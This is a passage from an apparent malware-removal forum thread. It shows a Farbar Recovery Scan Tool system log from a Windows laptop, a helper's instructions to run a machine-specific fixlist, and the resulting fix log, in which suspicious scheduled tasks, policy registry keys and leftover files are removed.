FirewallRules: [{AE3F85E6-7C30-4752-ABE8-1A8A54E50F1A}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismloader.exe
FirewallRules: [{7B69B2F9-AC3D-4CBD-B736-1A14454C0487}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{E68E90BB-1E71-4B56-A19F-AFF0749F5A20}] => (Allow) LPort=5556
FirewallRules: [{45BEF83D-8143-48C8-B84E-E557BC50AC22}] => (Allow) LPort=5558
FirewallRules: [{7DBD2BFE-720F-4137-BEEA-BADB6978843F}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{414A6F28-8A4C-4426-9508-C8BE1D4D185B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{5B869AB7-31F0-40C9-876C-5AF444350236}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{EA04E2D7-B327-465A-81F5-6721123D5517}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [TCP Query User{A3359ECA-A83E-41A9-9B8B-77DE98654F79}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [UDP Query User{90C32855-6548-4E45-A1AF-CC4AE6DC4286}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [{FECE8818-A771-4FDA-905C-419E61216C65}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{390B1ED0-CE02-4ED4-A6AB-4ED9187286E0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{5ADCC88B-B82B-4B81-A0A4-8DB21A184AAA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{4678A2EF-F88A-4DE7-83E2-3C868E4F1D01}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{2E06CFC3-8191-483D-9076-8C299A7D7A79}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{5E021D0C-B7B1-447D-9CDD-7FF91B92031D}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{BDFB7139-F650-459B-AB9F-BA35F0DBDE99}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [UDP Query User{AABB846D-16B2-4CB4-AE17-7707A831FC40}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [{BB3DDC02-D438-4562-BA16-342AA5CB6B5A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{49B8014D-F79F-4303-993D-4600006F699B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{66155D70-C2E6-4DEE-8D29-228F17E9836A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{65D8FD47-7254-4DB8-ACBB-9ACD1D86E8E8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EC4EC18B-13C0-458E-BF21-053751AE1308}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1118C594-EF00-4EBE-AA6D-ECBDE8BBBCB1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7059AB57-640C-47F0-AA0A-4A015998E125}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{9D507AF1-1103-4731-92A4-0D4A4E8A2FE9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{0C757126-CD26-4759-9E0B-F8CF62A2B334}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{ABD8F192-50BE-4791-88AC-38C60F6E496D}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{4D940F22-3D13-4CEB-8209-043E6C25AF44}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{CC40EEEB-1E6C-4DB9-BB3B-0E47496D03D5}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{9FFCB36C-A2FB-44C8-BD59-729C5D8E8C87}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{679CC4F7-02A9-44CD-AC16-6858A0499AA5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B58A077D-ACFE-4A10-AC6C-62F5B29BEA7A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{7603E194-FCBB-42BB-8112-8E5A2C8DB032}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{F192D31A-4726-452D-80E6-FC24D410BC22}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{200C029E-CFF4-4EA4-B1ED-BD183B276F39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/03/2017 09:10:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/03/2017 08:13:55 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: Shivang)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1515) (User: Shivang)
Description: Windows has backed up this user profile. Windows will automatically try to use the backup profile the next time this user logs on.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1502) (User: Shivang)
Description: Windows cannot load the locally stored profile. Possible causes of this error include insufficient security rights or a corrupt local profile.

DETAIL - The process cannot access the file because it is being used by another process.

Error: (03/03/2017 08:13:00 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1508) (User: NT AUTHORITY)
Description: Windows was unable to load the registry. This problem is often caused by insufficient memory or insufficient security rights.

DETAIL - The process cannot access the file because it is being used by another process.
for C:\Users\007\ntuser.dat

Error: (03/03/2017 08:10:11 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/03/2017 08:09:42 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: Shivang)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (03/03/2017 08:09:42 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1515) (User: Shivang)
Description: Windows has backed up this user profile. Windows will automatically try to use the backup profile the next time this user logs on.

Error: (03/03/2017 08:09:42 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1502) (User: Shivang)
Description: Windows cannot load the locally stored profile. Possible causes of this error include insufficient security rights or a corrupt local profile.

DETAIL - The process cannot access the file because it is being used by another process.


System errors:
=============
Error: (03/03/2017 09:00:09 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/03/2017 08:57:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:57:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:57:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:57:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The BstHdDrv service failed to start due to the following error:
%%2

Error: (03/03/2017 08:56:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 08:56:21 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056

Error: (03/03/2017 08:55:52 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Office Source Engine service terminated unexpectedly. It has done this 1 time(s).

Error: (03/03/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Dynamic Application Loader Host Interface Service service terminated unexpectedly. It has done this 1 time(s).

Error: (03/03/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel(R) Rapid Storage Technology service terminated unexpectedly. It has done this 1 time(s).


CodeIntegrity:
===================================
Date: 2016-11-28 20:31:52.646
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-11-28 20:31:52.621
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-09-25 21:36:08.416
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.403
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.392
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.382
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.367
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.358
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.346
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.337
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4500U CPU @ 1.80GHz
Percentage of memory in use: 46%
Total physical RAM: 8104.27 MB
Available physical RAM: 4313.79 MB
Total Virtual: 11944.27 MB
Available Virtual: 7920 MB

==================== Drives ================================

Drive c: (Windows8_OS) (Fixed) (Total:220.47 GB) (Free:3.58 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:4 GB) (Free:3.95 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 238.5 GB) (Disk ID: 8061B931)

Partition: GPT.

==================== End of Addition.txt ============================
 
Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.
 

Attachments

  • fixlist.txt
    4.9 KB
The program required me to restart the comp to complete its actions. Report is below.

Fix result of Farbar Recovery Scan Tool (x64) Version:04-10-2015
Ran by 007 (2017-03-03 22:19:39) Run:1
Running from C:\Users\007\Desktop
Loaded Profiles: 007 (Available Profiles: 007)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [No File]
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
2015-11-07 22:31 - 2015-11-07 22:31 - 20320792 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2015-11-07 19:57 - 2015-11-10 22:55 - 0012093 _____ () C:\Users\007\AppData\Roaming\AbsoluteReminder.xml
2016-01-03 21:17 - 2016-05-31 19:22 - 0000600 _____ () C:\Users\007\AppData\Local\PUTTY.RND
2016-09-23 22:04 - 2016-09-23 22:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
C:\Users\007\AppData\Local\Temp\dllnt_dump.dll
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {0D2FDC56-13CB-486A-BA0A-4C648309A083} - \{087F0D47-047E-057E-7911-7879097A110A} -> No File <==== ATTENTION
Task: {287685D1-1882-4B11-8A3F-7DA00FFC31C2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {36DF9173-D619-4613-85F9-64D7768DA80D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {8794EAED-EC72-4A28-B331-B9F73019EBBE} - System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe <==== ATTENTION
C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe
Task: {8992DB38-9182-4B89-A615-A01B3F8C9F8F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {A4497E84-87C6-4477-BDFD-E958CED4C0BE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {AA1E3E10-D4BA-4681-8F7C-779A395428D0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {C34D8C79-A216-4091-9D42-EC02CF67B018} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C55F594B-885F-4350-A465-7D88160B3801} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {CAFE5B51-DC10-4097-8DB7-704EE8566FA5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CC1FFF22-A79B-469F-9BBD-E135EF0BE706} - \Adobe Flash Player PPAPI Notifier -> No File <==== ATTENTION
Task: {DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {E1935286-5CEB-4530-9F4D-F6427CD704B9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {E6C59EFE-9151-4D35-BEA9-93E8415BF71B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\BlackChipPoker:Win32App_1
AlternateDataStreams: C:\Program Files\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files\CCleaner:Win32App_1
AlternateDataStreams: C:\Program Files\Dolby Digital Plus:Win32App_1
AlternateDataStreams: C:\Program Files\FileZilla FTP Client:Win32App_1
AlternateDataStreams: C:\Program Files\Intel:Win32App_1
AlternateDataStreams: C:\Program Files\iTunes:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Office 15:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files\WinRAR:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Apple Software Update:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\BlueStacks:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\DVD Shrink:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\LastPass:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Magical Jelly Bean:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\mIRC:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Mozilla Firefox:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\MSXML 4.0:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\QuickTime Alternative:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\TeamViewer:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VPN Unlimited:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VUDUToGo:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\XnConvert:Win32App_1
AlternateDataStreams: C:\WINDOWS\SysWOW64:Win32App_1
AlternateDataStreams: C:\ProgramData\BlueStacks:Win32App_1
AlternateDataStreams: C:\ProgramData\Intel(R) Update Manager:Win32App_1
AlternateDataStreams: C:\ProgramData\regid.1991-06.com.microsoft:Win32App_1

*****************

"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer" => key removed successfully
ibtsiva => Unable to stop service.
ibtsiva => service removed successfully
C:\Program Files (x86)\Common Files\lpuninstall.exe => moved successfully
C:\Users\007\AppData\Roaming\AbsoluteReminder.xml => moved successfully
C:\Users\007\AppData\Local\PUTTY.RND => moved successfully
Could not move "C:\ProgramData\DP45977C.lfl" => Scheduled to move on reboot.
C:\Users\007\AppData\Local\Temp\dllnt_dump.dll => moved successfully
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{03FC901B-03A8-46EB-801A-6B41B55D19B8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03FC901B-03A8-46EB-801A-6B41B55D19B8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D2FDC56-13CB-486A-BA0A-4C648309A083}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D2FDC56-13CB-486A-BA0A-4C648309A083}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{087F0D47-047E-057E-7911-7879097A110A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{287685D1-1882-4B11-8A3F-7DA00FFC31C2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{287685D1-1882-4B11-8A3F-7DA00FFC31C2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{36DF9173-D619-4613-85F9-64D7768DA80D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{36DF9173-D619-4613-85F9-64D7768DA80D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8519140C-2AEF-4987-B1B6-075F6AAB760A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8519140C-2AEF-4987-B1B6-075F6AAB760A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfee Remediation (Prepare)" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8794EAED-EC72-4A28-B331-B9F73019EBBE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8794EAED-EC72-4A28-B331-B9F73019EBBE}" => key removed successfully
C:\WINDOWS\System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF}" => key removed successfully
"C:\ProgramData\{71C75252-C66C-E5F9-9497-4BAF4FE285CA}\4630C17C-F19B-76D7-D36D-40D2603D087A.exe" => File/Folder not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8992DB38-9182-4B89-A615-A01B3F8C9F8F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8992DB38-9182-4B89-A615-A01B3F8C9F8F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A4497E84-87C6-4477-BDFD-E958CED4C0BE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A4497E84-87C6-4477-BDFD-E958CED4C0BE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AA1E3E10-D4BA-4681-8F7C-779A395428D0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA1E3E10-D4BA-4681-8F7C-779A395428D0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C34D8C79-A216-4091-9D42-EC02CF67B018}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C34D8C79-A216-4091-9D42-EC02CF67B018}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C55F594B-885F-4350-A465-7D88160B3801}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C55F594B-885F-4350-A465-7D88160B3801}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-Weekend" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CAFE5B51-DC10-4097-8DB7-704EE8566FA5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAFE5B51-DC10-4097-8DB7-704EE8566FA5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CC1FFF22-A79B-469F-9BBD-E135EF0BE706}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC1FFF22-A79B-469F-9BBD-E135EF0BE706}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player PPAPI Notifier" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E1935286-5CEB-4530-9F4D-F6427CD704B9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1935286-5CEB-4530-9F4D-F6427CD704B9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
